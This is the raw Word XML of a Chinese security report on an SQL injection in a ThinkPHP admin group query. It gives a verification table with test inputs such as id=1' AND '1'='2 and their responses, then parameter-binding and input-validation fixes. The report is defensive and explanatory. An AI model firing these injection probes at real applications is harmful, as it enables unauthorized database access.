      </w:tr>
      <w:tr w:rsidR="008B2808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id=1' AND '1'='2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 xml:space="preserve">30,044 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>字节</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2250" w:type="dxa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False</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>条件，返回空数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B2808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id=1'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 xml:space="preserve">6,625 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>字节</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FC"/>
          </w:tcPr>
          <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>语法错误，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ThinkPHP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>报错</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>验证结论：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>单引号成功逃逸</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>字符串上下文，触发语法错误（</w:t>
      </w:r>
      <w:r>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:t>响应）；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>布尔条件成功影响</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>查询结果（响应大小差异</w:t>
      </w:r>
      <w:r>
        <w:t>791</w:t>
      </w:r>
      <w:r>
        <w:t>字节）；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>注入点位于</w:t>
      </w:r>
      <w:r>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>子句，支持子查询和条件注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复前（存在漏洞的代码）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62478" name="漏洞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漏洞代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808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>方案一：使用数组参数绑定（推荐）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>$user_groups = Db::name('AdminGroupAccess')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;alias('a')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;join("AdminGroup g", "a.group_id=g.id", 'LEFT')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;where([['a.uid', '=', $id], ['g.status', '=', '1']])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;select()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;toArray();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>方案二：使用命名参数绑定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>$user_groups = Db::name('AdminGroupAccess')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;alias('a')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;join(</w:t>
      </w:r>
      <w:r>
        <w:t>"AdminGroup g", "a.group_id=g.id", 'LEFT')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;where('a.uid = :uid and g.status = :status', ['uid' =&gt; $id, 'status' =&gt; '1'])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;select()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -&gt;toArray();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>方案三：输入校验（深度防御）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>在方法开头添加输入校验</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>$id = get_params('id');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>if (!is_numeric($id) || $id &lt;=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return to_assign(1, '</w:t>
      </w:r>
      <w:r>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$id = (int)$id;  // </w:t>
      </w:r>
      <w:r>
        <w:t>强制类型转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>全局修复建议：全项目搜索并替换所有使用</w:t>
      </w:r>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t>字符串插值构建</w:t>
      </w:r>
      <w:r>
        <w:t>SQL WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>子句的代码模式，统一改为</w:t>
      </w:r>
      <w:r>
        <w:t>ThinkPHP</w:t>
      </w:r>
      <w:r>
        <w:t>数组参数绑定方式。建议在代码审查流程中加入</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>注入检测规则（如禁止在</w:t>
      </w:r>
      <w:r>
        <w:t>Db::name()-&gt;where()</w:t>
      </w:r>
      <w:r>
        <w:t>中使用双引号字符串）。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008B280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11B" w:rsidRDefault="00B3511B" w:rsidP="000B4B15">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B3511B" w:rsidRDefault="00B3511B" w:rsidP="000B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11B" w:rsidRDefault="00B3511B" w:rsidP="000B4B15">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B3511B" w:rsidRDefault="00B3511B" w:rsidP="000B4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B2808"/>
    <w:rsid w:val="000B4B15"/>
    <w:rsid w:val="001E4448"/>
    <w:rsid w:val="008B2808"/>
    <w:rsid w:val="00B3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49926"/>
  <w15:docId w15:val="{0D10BC8E-162B-47A5-AAF1-91AE3031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Arial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360" w:after="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:color w:val="1F3864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40"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:color w:val="2F549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hd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      <w:spacing w:after="0" w:line="260" w:lineRule="auto"/>
      <w:ind w:left="360" w:right="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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0B4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B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B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B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Sysceo.com</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-16T02:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-16T03:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>